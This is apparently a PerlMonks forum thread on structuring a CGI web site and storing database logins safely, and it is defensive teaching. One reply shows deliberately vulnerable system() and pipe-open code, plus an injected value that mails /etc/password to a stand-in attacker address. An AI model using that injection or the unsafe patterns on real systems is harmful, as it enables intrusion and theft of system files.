Re: Structing a Web site and security issues
by blue_cowdawg (Monsignor) on Dec 26, 2005 at 17:22 UTC
|
1. Where do you place your Perl modules/scripts?
2. Where do you place your database log-on info and is it encrypted?
3. What is considered "best practice" if that can even be answered?
The answer to all three questions is: "It depends"
The first question I'd ask myself before answering any of
those questions is what are the risk factors that I am
trying to mitigate? What am I trying to protect and
how "valuable" a target is it?
The next factor I am going to look at is what facilities
I have at my disposal to help boost my security stance.
For instance, the old hosting provider I had for my
personal website had the account's
directory structure such that there was one directory
tree for any files associated with my account. In other
words any file I put in my accounts file space could
potentially be in the path of the web server serving up
pages and possibly be exposed to a browser.
My current provider has my file space such that there
are actually two file trees and even my HOME directory
is structured so that the web files are a subdirectory
under HOME. That means I can place my home grown
Perl modules somewhere out of the way of a browser not
to mention any configuration files. The result is
none of my CGI scripts ever have information like database
logins in the source code itself.
So to answer question #1, if I have my druthers I keep
the CGI scripts with just the essential code in the
cgi-bin. That's just how it has to be unless I have control
over the webserver and can tailor it. I keep modules that
those scripts are dependant on elsewhere out of the normal
browsing path and do something like
use lib qw@ .... path goes here @;
to point to where their at.
To anwer #2 I keep my database login info in a
configuration file (again outside the browsing path) and
lately I've been using XML::Simple to read it
in but there are other ways.
I know there are monks out there that will disagree
with this statement but "best practice" is
a) in the eye of the beholder and b) depends on many
factors. One of those factors being what facilities you
have available to you and another being to what degree
do you need to be cautious. Websites that I am working
on that involve financial data are going to be sites that
I'm much more security concious of than say my dog club's
web page announcing upcoming events. Keep in mind that
no matter how secure you set things up all you are doing
is raising the bar you are never going keep someone out
who is sufficiently motivated and/or knowlegeable of
how to circumvent security.
Last thought: there are some things you do have to
consider in your coding that you really didn't ask about
in the list above.
- Data validation Make sure any inputs you process
aren't going to do things you don't expect.
- File uploads Treat with care. There are good
ways of handling them and bad ways and make sure you
understand what you are doing before working them.
- Injection attacks Make sure you understand what
they are, how they work and avoid code that is suseptible
to them.
- Remote executions Web applications that allow
random users to execute things on your machine is a really
bad idea. If you insist on doing that make sure to take
appropriate precautions to avoid malicious activity.
Peter L. Berghold -- Unix Professional
Peter -at- Berghold -dot- Net; AOL IM redcowdawg Yahoo IM: blue_cowdawg
| [reply] [d/l] |
|
|
Thanks blue_cowdawg for your lengthy answer. There is so much to learn about Unix, servers, permissions, etc.
I've been using CGI::Application::Plugin::Config::Simple to read in my parameters. But tirwhan has me nervous about storing those logins at all.
Data validation ...
Thanks, I'm validating and untainting everything!
File uploads Treat with care.
I've been validating type, size, and then using CGI upload for this. Any other caveats?
Injection attacks...
Using placeholders for everything (I've been a monk long enough to never go without these)
Remote executions Web applications that allow random users to execute things
Do you have an example of this? I don't *think* I'm doing this.
—Brad "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
| [reply] |
|
|
|
| handwaving of HTML here...
|
<p>
Type in the address you want to look up
<input type="text" name="host_to_search_rq">
</p>
|
with the CGI of
#
# Stuff left out....
my $hostname=$cgi->param('host_to_search_rq');
system("nslookup $hostname"); #BAD!!! BAD!!! BAD!!!
#
#
First off it is concievable that the malicious hax0r
has partially compromised your system already and has
a script of their own named "nslookup" sitting in your
path so you want to only invoke shell commands within
your CGI using fully qualified pathnames to commands. That
still doesn't fully get you off the hook, but it is a good
start.
Secondly, having not checked the contents of
$hostname and blindly executing the query
leaves you open to an injection attack. A malicious
induhvidual could enter the string
";cat /etc/password | /usr/ucb/Mail hax0rRus@hax0r.org" which then sends them the contents
of your /etc/password file for a future brute force attack.
Another Dumb Idea® that I've actually seen folks
do:
|
| Much handwaving again...
|
if (! $cgi->param('command_rq') ) {
print $cgi->p("input a command: ",
$cgi->text(-name=>"command_rq") );
} else {
# OH MY GOD!!! DON'T DO THIS!
open PIPE,$cgi->parma('command_rq') . "|"
or die $!;
my @results = <PIPE>
print $cgi->pre(@results);
}
Talk about asking for trouble!
Just a few ways to crash and burn in the world
of CGI....
Just remember, the web is not the "village"
it used to be any more. It has grown up into a very
large urban area with hookers and muggers on quite a few
of the street corners. You would use caution if you had
to walk through someplace like that in the Real World™
and you certainly wouldn't leave your doors unlocked
there or put valuables out on the front porch. If you can
think of a way to break your own security (and your should
try and think of ways) someone else can too.
Peter L. Berghold -- Unix Professional
Peter -at- Berghold -dot- Net; AOL IM redcowdawg Yahoo IM: blue_cowdawg
| [reply] [d/l] [select] |
Re: Structuring a Web site and security issues
by tirwhan (Abbot) on Dec 26, 2005 at 17:24 UTC
|
If you're tring to get Apache to run under your user id (so that it can access files and directories owned by you), you should take a look at the suexec mechanism. If you're further looking to improve your security, maybe consider running apache in a chrooted/jailed environment. As for the datbase logs, you should never log username/password information (unless you're debugging), if you further want to secure your logs you could write to a named pipe and have another process (running as a different user) read from the pipe and log to a file not readable by your user.
Securing a website properly is a rather large topic and covers lots of areas (network security, host security, programming securely). There are lots of books on the subject though.
A computer is a state machine. Threads are for people who can't program state machines. -- Alan Cox
| [reply] [d/l] |
|
|
Thanks tirwhan.
First, I looked at suexec and decided I need to have a real pro set that up for me. Heady stuff indeed.
Secondly, could you recommend some books that you have found helpful. I did read CGI Programming with Perl, but doesn't go into the detail I'm needing right now.
Lastly, can you tell me where I can find out more about the piping scenario you mention? Sounds like it might be the ticket, but I'd like a bit moe of a nudge.
Thanks.
—Brad "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
| [reply] |
|
|
Heady stuff indeed
:-) Yeah, suexec looks a bit intimidating. Once you get going it's not quite as bad as the docs make out though.
It's not too easy to give book recommendations, because you haven't said what OS you're on, but these are some that I find very valuable on the subject:
These cover different areas, all of them important.
For the pipe, use the mkfifo command to create a pipe somewhere on your filesystem. Set permissions on the pipe to 0640, owned by your logging user (nobody) and a group that nobody does not belong to. You then need to start a process (as member of the reading group) that reads from the pipe and logs to a file which is inaccessible to nobody. I use socat for this but it's be easy to write something yourself.
This way the nobody users can not see past logs (though he can sniff logs as they are written). The method has two drawbacks: 1.) The user can delete the pipe and create a file in its stead. If this happens at the same time as an apache restart, the server will then log to the file, which is readable by the user. 2.) If your second process (the one reading from the pipe) dies, the server cannot write and will fail.
Another alternative is to write logs over the network, though this has its own problems and drawbacks.
A computer is a state machine. Threads are for people who can't program state machines. -- Alan Cox
| [reply] [d/l] [select] |
Re: Structuring a Web site and security issues
by jhourcle (Prior) on Dec 26, 2005 at 18:09 UTC
|
I've been using CGIwrap for years (probably ~8 now)...
1. I don't think your 'use lib' line is correct. It tells the script to go up a directory, and to try to go up what looks to be the URL path... which are not directories.
On shared systems, I keep my modules in my home directory, and might have a path like '/users/username/lib/perl5/' or similar. (it's outside of the directory that has my CGI scripts, and there's no 'cgiwrap' involved, as that's typically an executable). The folks at the hosting ISP should be able to help you.
2. I keep it in a file w/out group/world read permissions, outside of any location being served by the webserver (which may be in a perl module, as I don't keep those in a servable location). I don't tend to encrypt them, as the decryption routines (and the necessary seed) are all accessible from the machine, so it's just extra work for me to maintain, with little added security (but see answer to #3)
3. I don't believe there is such a thing as 'best practice'. You have to evaluate each situation differently, and determine what the potential benefits and risks are.
Now -- for the comments about CGIwrap itself ... yes, it adds a little overhead to a plain CGI call, so there are tradeoffs. (and it's much slower than mod_perl, or fastCGI). As for the security issues, the ones I know about are not from the main CGIwrap distribution -- they're from a modified version of CGIwrap that was shipped w/ Cobalt Raq servers. (later bought by Sun). There was a more recent report of a format string vulnerability about 2 years ago, but it was unsubstantiated. As with any tool, there are possibilities of misconfiguration (don't allow cgiwrapd to be called from remote subnets)...
The only thing I can think of that might be an issue is the error messages that CGIwrap throws when you have your system mis-configured (ie, it telling you that permissions are wrong, etc), might leak a little too much info to the outside world.)
| [reply] |
|
|
Well, I just found out from Pair that I can't call a CGIwrapped module from my own script. So, I'm outta luck there.
I'm leaning towards placing my instance scripts in a directory on the web side, but having them call my modules located in a directory in my home. For now, until I look at tirwhan's aforementioned piping scheme, I'm thinking of just keeping my config files in the same directory, because I can at least set it to 701.
—Brad "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
| [reply] |
|
|
I've also been using cgiwrap for a long time, and I loooove it.
The idea of a cgiwrapped module doesn't really make sense. You need to launch your script with cgiwrap, then it will load your modules and you'll be happy.
Instead of making your application and trying to figure out CGIwrap with it, make a few really simple scripts that test the functionality of CGIwrap. Then, once you've figured out CGIwrap, tackle your application.
Here's what I'd recommend.
Step 1) Make a really dopey whoami script..
#! /usr/bin/perl -w -T
print $<;
I don't know if that will actually work. You might have to make it generate HTML tags, headers, etc... The important part is that it's a really simple script that only does one thing, which is print your UID.
Step 2) Make a similarly dopey script that reads your config file. Maybe even a shell script, like this:
#! /bin/bash
cat /home/me/myfiles/.config
When you're making the whoami script work, you might struggle with CGIwrap's funny URL convention. Make sure you understand it before you go any further. For example:
If you have a script at /home/me/myfiles/cgi-bin/woot.pl
You'd have to call it as http://myserver/cgi-bin/cgiwrap/me/woot.pl
Your ISP can customise that, and they might even set up helpers to make it easier... Just make sure you understand it.
Good Luck
--Pileofrogs
| [reply] [d/l] [select] |
|
|
Re: Structuring a Web site and security issues
by gmccreight (Sexton) on Dec 27, 2005 at 01:55 UTC
|
From a security standpoint, CGI::Carp qw(fatalsToBrowser) isn't a great idea in production. You should consider logging instead. fatalsToBrowser makes sense during development (quickly see when code fails), but in production it's just another avenue for your website's users to gather information about the internal workings of your site.
| [reply] |
|
|
| [reply] |
#2 (Re: Structuring a Web site and security issues)
by Your Mother (Archbishop) on Dec 27, 2005 at 07:53 UTC
|
MySQL in particular has a neat trick for keeping your password and username secure and out of your code entirely (best practice: never hard code passwords). So, if you're using it, check out DBD::mysql and look for mysql_read_default_file. The password (and dbuser and even other MySQL vars) can be in a config file only readable by the user (make its perms 0400 or 0600).
| [reply] |
|
|
[client]
host=localhost
[perl]
host=perlhost
What would the syntax be to have usr and password in there as well?
Thanks for the tip.
update
The following did the trick:
[client]
host=xxxxxx
user=yyyyyy
password=zzzzzzz
| [reply] [d/l] [select] |
|
|
| [reply] |
Re: Structuring a Web site and security issues
by sgifford (Prior) on Dec 27, 2005 at 20:42 UTC
|
My random snippets of advice:
- Use taint mode (the -T flag). This makes it much harder to shoot yourself in the foot with many types of injection attacks. Look at the options in the DBI module that will allow you to treat SQL data as tainted and SQL statements as dangerous.
- Put your CGI scripts outside of a public_html area, if possible. Just in a cgi-bin directory is fine. Otherwise a small mistake could allow the script's source to be viewed, which could be dangerous if it contains passwords.
- Put your Perl modules in another directory altogether (I call mine cgi-lib), so they can't be executed on their own from cgi-bin or viewed in a public_html directory.
- Make your scripts with passwords readable only by the user the Web server runs as and by you, if possible. This reduces the circumstances under which the passwords can be viewed.
- Make sure the user the Web server runs doesn't have permission to write anywhere that could be executed, including areas where execution could be turned on in an .htaccess file. That can allow a "write to the filesystem" bug to escalate to a "full control of your Web site" bug.
| [reply] |